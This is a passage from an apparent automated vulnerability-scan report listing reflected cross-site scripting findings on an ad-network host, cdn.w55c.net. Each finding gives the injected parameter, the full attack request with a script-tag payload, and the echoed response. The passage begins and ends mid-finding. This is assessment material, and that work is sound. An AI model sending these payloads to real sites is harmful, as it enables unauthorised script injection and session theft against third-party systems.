Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679995&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661995029&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661995034&frm=1&adk=2614322350&ga_vid=1092593501.1303661995&ga_sid=1303661995&ga_hid=294155726&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:13:06 GMT
Server: w55c.net
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:20:08 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Tue, 19 Apr 2011 21:53:32 GMT
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 424
Cache-Control: no-cache, no-store
pragma: no-cache
Via: 1.1 mdw061002 (MII-APC/1.6)
Content-Length: 2260

<IFRAME SRC="http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB
...[SNIP]...
1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQabca4"><script>alert(1)</script>be9a44755d8&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rur
...[SNIP]...

6.98. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [slotid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rl7Vm3VTU_682412618.html

Issue detail

The value of the slotid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb88f"><script>alert(1)</script>722133c288 was submitted in the slotid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=bb88f"><script>alert(1)</script>722133c288&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679995&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661995029&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661995034&frm=1&adk=2614322350&ga_vid=1092593501.1303661995&ga_sid=1303661995&ga_hid=294155726&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:13:06 GMT
Server: w55c.net
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:20:09 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Tue, 19 Apr 2011 21:53:32 GMT
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 425
Cache-Control: no-cache, no-store
pragma: no-cache
Via: 1.1 mdw061006 (MII-APC/1.6)
Content-Length: 2254

<IFRAME SRC="http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=bb88f"><script>alert(1)</script>722133c288&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rur
...[SNIP]...

6.99. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [wp_exchange parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rl7Vm3VTU_682412618.html

Issue detail

The value of the wp_exchange request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1c20"><script>alert(1)</script>b68b6149f0e was submitted in the wp_exchange parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCAf1c20"><script>alert(1)</script>b68b6149f0e&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679995&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661995029&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661995034&frm=1&adk=2614322350&ga_vid=1092593501.1303661995&ga_sid=1303661995&ga_hid=294155726&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:13:06 GMT
Server: w55c.net
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:20:06 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Tue, 19 Apr 2011 21:53:32 GMT
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 422
Cache-Control: no-cache, no-store
pragma: no-cache
Via: 1.1 mdw061005 (MII-APC/1.6)
Content-Length: 2260

<IFRAME SRC="http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB
...[SNIP]...
TgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCAf1c20"><script>alert(1)</script>b68b6149f0e&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0
...[SNIP]...

6.100. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [wp_exchange parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rl7Vm3VTU_682412618.html

Issue detail

The value of the wp_exchange request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fa8b"><script>alert(1)</script>81a0cddd67 was submitted in the wp_exchange parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=2fa8b"><script>alert(1)</script>81a0cddd67&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679995&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661995029&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661995034&frm=1&adk=2614322350&ga_vid=1092593501.1303661995&ga_sid=1303661995&ga_hid=294155726&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:59:04 GMT
Server: w55c.net
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:20:07 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Tue, 19 Apr 2011 21:53:32 GMT
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 1264
Cache-Control: no-cache, no-store
pragma: no-cache
Via: 1.1 mdw061002 (MII-APC/1.6)
Content-Length: 2182

<IFRAME SRC="http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB
...[SNIP]...
xJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=2fa8b"><script>alert(1)</script>81a0cddd67&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0
...[SNIP]...

6.101. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [zc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rl7Vm3VTU_682412618.html

Issue detail

The value of the zc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c814d"><script>alert(1)</script>6ce1ac24f was submitted in the zc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=c814d"><script>alert(1)</script>6ce1ac24f&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679995&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661995029&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661995034&frm=1&adk=2614322350&ga_vid=1092593501.1303661995&ga_sid=1303661995&ga_hid=294155726&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:13:06 GMT
Server: w55c.net
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:20:15 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Tue, 19 Apr 2011 21:53:32 GMT
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 431
Cache-Control: no-cache, no-store
pragma: no-cache
Via: 1.1 mdw061004 (MII-APC/1.6)
Content-Length: 2242

<IFRAME SRC="http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB
...[SNIP]...
Y&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=c814d"><script>alert(1)</script>6ce1ac24f&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw?" WIDTH=160 HEIGHT=600 MARG
...[SNIP]...

6.102. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [zc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rl7Vm3VTU_682412618.html

Issue detail

The value of the zc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b8fa"><script>alert(1)</script>13567316b20 was submitted in the zc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc2b8fa"><script>alert(1)</script>13567316b20&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679995&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661995029&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661995034&frm=1&adk=2614322350&ga_vid=1092593501.1303661995&ga_sid=1303661995&ga_hid=294155726&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:13:06 GMT
Server: w55c.net
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:20:14 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Tue, 19 Apr 2011 21:53:32 GMT
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 430
Cache-Control: no-cache, no-store
pragma: no-cache
Via: 1.1 mdw061007 (MII-APC/1.6)
Content-Length: 2260

<IFRAME SRC="http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB
...[SNIP]...
d=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc2b8fa"><script>alert(1)</script>13567316b20&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw?">
...[SNIP]...

6.103. http://cdn.w55c.net/i/0RuFuATqDZ_452086828.html [btid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RuFuATqDZ_452086828.html

Issue detail

The value of the btid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9b88b'><script>alert(1)</script>2e52ce55555 was submitted in the btid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0RuFuATqDZ_452086828.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NERCNDNGOEEwMDAwQzA2QjBBRTUzQThBMjczNjIyMjd8R0ZKczh3VGxEUHwxMzAzNjU4MzgwMTAwfDF8MEZwU0VZRzVFdXwwUnVGdUFUcURafEVYXzEwMjM0NzcyMDZ8ODUwMDAw9b88b'><script>alert(1)</script>2e52ce55555&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_igAAwGsK5TqKJzYiJ8PEWQEBkOCrFi1HVQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZwU0VZRzVFdQ&ciu=MFJ1RnVBVHFEWg&reqid=NERCNDNGOEEwMDAwQzA2QjBBRTUzQThBMjczNjIyMjc&ccw=SUFCMSMwLjB8SUFCOCMwLjA&bp=850&zc=NzUyMDc&v=0&s=http%3A%2F%2F& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658381022&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303658381041&frm=1&adk=513358139&ga_vid=971996930.1303658381&ga_sid=1303658381&ga_hid=548328206&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&eid=33895132&fu=4&ifi=1&dtd=27
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

